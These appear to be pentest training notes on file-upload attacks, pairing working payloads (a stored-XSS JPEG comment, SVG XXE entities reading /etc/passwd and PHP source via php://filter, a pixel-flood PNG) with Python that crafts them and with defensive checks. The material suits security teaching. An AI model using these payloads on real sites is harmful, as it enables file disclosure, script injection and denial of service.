XSS

Some sites read image metadata (EXIF, XMP or the JPEG comment field) and render it into the page, for example as a caption or in a file details view. If that output is not HTML-encoded, a payload stored in the metadata runs as stored XSS. Write it into the comment field with:

exiftool -Comment=' "><img src=1 onerror=alert(window.origin)>' HTB.jpg
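The payload only fires where the comment is reflected without encoding; the alert on window.origin tells you which origin the script runs in. As an added example (not code from the original page), the following Python builds the same JPEG COM (0xFFFE) segment that the exiftool command above writes, reads it back the way a metadata viewer would, and contrasts the vulnerable caption template with the escaped one. The header-only sample JPEG, the PAYLOAD constant and the render_caption template are constructed for this example and are assumptions, not anything from the page.

```python
# Added example: craft and read the JPEG COM segment that carries the XSS payload.
import html
import struct

SOI = b"\xff\xd8"
EOI = b"\xff\xd9"
COM = 0xFE
# Markers that carry no length field: SOI, EOI, TEM and RST0..RST7.
STANDALONE = {0xD8, 0xD9, 0x01} | set(range(0xD0, 0xD8))

# Payload from the page: the leading "> closes whatever attribute the comment is reflected into.
PAYLOAD = '"><img src=1 onerror=alert(window.origin)>'

# Constructed sample: a header-only JPEG (SOI + EOI). It holds no pixel data,
# but that is enough to exercise the segment walker a metadata reader uses.
MINIMAL_JPEG = SOI + EOI


def inject_comment(jpeg: bytes, comment: str) -> bytes:
    """Insert a COM segment right after SOI. The 2-byte length counts itself."""
    if not jpeg.startswith(SOI):
        raise ValueError("not a JPEG (missing SOI)")
    data = comment.encode("utf-8")
    if len(data) + 2 > 0xFFFF:
        raise ValueError("comment too long for a single COM segment")
    segment = b"\xff" + bytes([COM]) + struct.pack(">H", len(data) + 2) + data
    return SOI + segment + jpeg[2:]


def read_comments(jpeg: bytes) -> list:
    """Walk marker segments up to SOS/EOI and return every COM payload as text."""
    comments = []
    pos = 2  # skip SOI
    while pos + 2 <= len(jpeg):
        if jpeg[pos] != 0xFF:
            raise ValueError(f"expected marker byte at offset {pos}")
        marker = jpeg[pos + 1]
        if marker in (0xD9, 0xDA):  # EOI, or SOS: entropy-coded data follows
            break
        if marker in STANDALONE:
            pos += 2
            continue
        if pos + 4 > len(jpeg):
            raise ValueError("truncated segment header")
        (length,) = struct.unpack(">H", jpeg[pos + 2:pos + 4])
        body = jpeg[pos + 4:pos + 2 + length]
        if marker == COM:
            comments.append(body.decode("utf-8", errors="replace"))
        pos += 2 + length
    return comments


def render_caption(comment: str, escape: bool) -> str:
    """Hypothetical caption template: the vulnerable form vs. the fixed form."""
    if escape:
        # html.escape with quote=True also encodes " and ', so the attribute cannot be closed.
        return f'<img alt="{html.escape(comment, quote=True)}">'
    return f'<img alt="{comment}">'


if __name__ == "__main__":
    tagged = inject_comment(MINIMAL_JPEG, PAYLOAD)
    print(read_comments(tagged))
    print(render_caption(read_comments(tagged)[0], escape=False))
    print(render_caption(read_comments(tagged)[0], escape=True))
```

The walker stops at SOS, so a comment placed after the scan data would be missed; exiftool writes COM before SOS, which is where inject_comment puts it too.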

XXE

With SVG images: an SVG is an XML document, so if the upload handler passes it through a parser that resolves external entities, a DOCTYPE declaring an external entity pulls a local file into the rendered output.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>
<svg>&xxe;</svg>

Files that are not well-formed XML (binary data, or PHP source containing `<?php` tags) break the parse, so wrap them with the php://filter base64 stream wrapper and decode the result. This reads the application's own source code:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>
<svg>&xxe;</svg>
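The usual fix on the server side is to reject any DOCTYPE or ENTITY declaration before the file reaches an XML parser, on top of disabling entity resolution in the parser itself. As an added example (not code from the original page), the following Python implements that pre-parse gate, runs it over the two payloads above and a benign SVG, and only then hands the bytes to Python's ElementTree. The MAX_PIXELS-style constants, the function names and the benign sample SVG are assumptions made for this example; the BOM handling is there because a UTF-16 encoded payload would otherwise slip past a byte-level regex.

```python
# Added example: pre-parse gate for uploaded SVG files against XXE payloads.
import re
import xml.etree.ElementTree as ET

# Payloads from the page.
XXE_FILE = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>\n'
    "<svg>&xxe;</svg>"
)
XXE_PHP = (
    '<?xml version="1.0" encoding="UTF-8"?>\n'
    '<!DOCTYPE svg [ <!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=index.php"> ]>\n'
    "<svg>&xxe;</svg>"
)
# Constructed benign sample for comparison.
BENIGN_SVG = (
    '<?xml version="1.0"?>'
    '<svg xmlns="http://www.w3.org/2000/svg" width="10" height="10">'
    '<rect width="10" height="10"/></svg>'
)

PREDEFINED_ENTITIES = {"lt", "gt", "amp", "quot", "apos"}
ENTITY_REF_RE = re.compile(r"&([A-Za-z_][\w.\-]*);")  # named refs only; &#..; is numeric


def decode_upload(data: bytes) -> str:
    """Decode by BOM so a UTF-16 payload cannot hide from the text checks."""
    for bom, enc in ((b"\xef\xbb\xbf", "utf-8-sig"), (b"\xff\xfe", "utf-16"), (b"\xfe\xff", "utf-16")):
        if data.startswith(bom):
            return data.decode(enc)
    return data.decode("utf-8", errors="replace")


def svg_problems(data: bytes) -> list:
    """Return the reasons an SVG upload should be refused; empty list means clean."""
    text = decode_upload(data)
    problems = []
    if re.search(r"<!DOCTYPE", text, re.IGNORECASE):
        problems.append("DOCTYPE declaration")
    if re.search(r"<!ENTITY", text, re.IGNORECASE):
        problems.append("ENTITY declaration")
    # Defence in depth: no custom entity can be declared, so none may be referenced.
    for ref in sorted(set(ENTITY_REF_RE.findall(text)) - PREDEFINED_ENTITIES):
        problems.append(f"custom entity reference &{ref};")
    return problems


def parse_svg(data: bytes) -> ET.Element:
    """Gate first, parse second, and insist the document really is an SVG."""
    problems = svg_problems(data)
    if problems:
        raise ValueError("rejected SVG: " + "; ".join(problems))
    root = ET.fromstring(data)  # bytes in, so expat applies the declared encoding itself
    if root.tag not in ("svg", "{http://www.w3.org/2000/svg}svg"):
        raise ValueError(f"root element is {root.tag!r}, not <svg>")
    return root


def accept_svg(data: bytes) -> bool:
    """Convenience wrapper: True if the upload passes the gate and parses as SVG."""
    try:
        parse_svg(data)
        return True
    except (ValueError, ET.ParseError):
        return False


if __name__ == "__main__":
    for name, sample in (("file", XXE_FILE), ("php", XXE_PHP), ("benign", BENIGN_SVG)):
        print(name, svg_problems(sample.encode()), accept_svg(sample.encode()))
```

The gate is deliberately stricter than the XML spec: a DOCTYPE has no legitimate use in an uploaded SVG, so refusing it outright is cheaper and safer than trying to tell a harmless one from an entity bomb or an external entity.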

DoS

When the target accepts JPG or PNG uploads we can do a pixel flood attack: the image header declares dimensions of 0xffff * 0xffff (65535 x 65535) while the file itself stays tiny.

A decoder that trusts the header allocates a buffer for roughly 4.3 billion pixels before it reads any pixel data: about 4 GB at one byte per pixel and around 16 GB for RGBA, so the process exhausts memory or is killed.
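As an added example (not code from the original page), the following Python crafts a PNG whose IHDR declares 0xffff x 0xffff while carrying a single pixel of data, and implements the check an upload handler should run before decoding: read the dimensions from the header, verify the chunk CRC, and refuse anything above a pixel budget. The MAX_PIXELS budget, the function names and the one-pixel IDAT payload are assumptions made for this example. The PNG chunk layout (length, type, data, CRC over type + data) and the IHDR fields follow the PNG specification.

```python
# Added example: craft a pixel-flood PNG and the pre-decode dimension check that stops it.
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"
MAX_PIXELS = 25_000_000  # assumed policy: ~25 MP, about 100 MB once decoded as RGBA


def png_chunk(ctype: bytes, body: bytes) -> bytes:
    """Length, type, data, CRC32 over type + data (PNG chunk layout)."""
    crc = zlib.crc32(ctype + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", crc)


def pixel_flood_png(width: int = 0xFFFF, height: int = 0xFFFF) -> bytes:
    """Valid-looking PNG whose IHDR claims width x height but holds one RGBA pixel."""
    # IHDR: width, height, bit depth 8, colour type 6 (RGBA), compression, filter, interlace.
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 6, 0, 0, 0)
    raw = b"\x00" + b"\x00\x00\x00\xff"  # one scanline: filter byte + a single RGBA pixel
    return (
        PNG_SIG
        + png_chunk(b"IHDR", ihdr)
        + png_chunk(b"IDAT", zlib.compress(raw))
        + png_chunk(b"IEND", b"")
    )


def png_dimensions(data: bytes) -> tuple:
    """Read (width, height) from IHDR without decoding, checking its CRC."""
    if not data.startswith(PNG_SIG):
        raise ValueError("not a PNG")
    length, ctype = struct.unpack(">I4s", data[8:16])
    if ctype != b"IHDR" or length != 13:
        raise ValueError("first chunk is not a 13-byte IHDR")
    body = data[16:29]
    (crc,) = struct.unpack(">I", data[29:33])
    if zlib.crc32(b"IHDR" + body) & 0xFFFFFFFF != crc:
        raise ValueError("IHDR CRC mismatch")
    width, height = struct.unpack(">II", body[:8])
    return width, height


def decoded_size_bytes(width: int, height: int, bytes_per_pixel: int = 4) -> int:
    """Memory a naive decoder would allocate for the declared dimensions."""
    return width * height * bytes_per_pixel


def check_upload(data: bytes) -> tuple:
    """(accepted, reason): enforce the pixel budget from the header alone."""
    width, height = png_dimensions(data)
    if width == 0 or height == 0:
        return False, "zero dimension"
    pixels = width * height
    if pixels > MAX_PIXELS:
        gib = decoded_size_bytes(width, height) / 2**30
        return False, f"{width}x{height} = {pixels:,} pixels exceeds MAX_PIXELS ({gib:.1f} GiB as RGBA)"
    return True, "ok"


if __name__ == "__main__":
    bomb = pixel_flood_png()
    print(len(bomb), "bytes on disk, declares", png_dimensions(bomb))
    print(check_upload(bomb))
    print(check_upload(pixel_flood_png(64, 64)))
```

The same idea applies to JPEG: read the height and width from the SOFn segment (marker 0xFFC0 to 0xFFCF, excluding C4, C8 and CC) before decoding. Libraries that already budget on declared dimensions, such as Pillow with its MAX_IMAGE_PIXELS limit, raise an error or warning instead of allocating, but only if the upload path actually goes through that library.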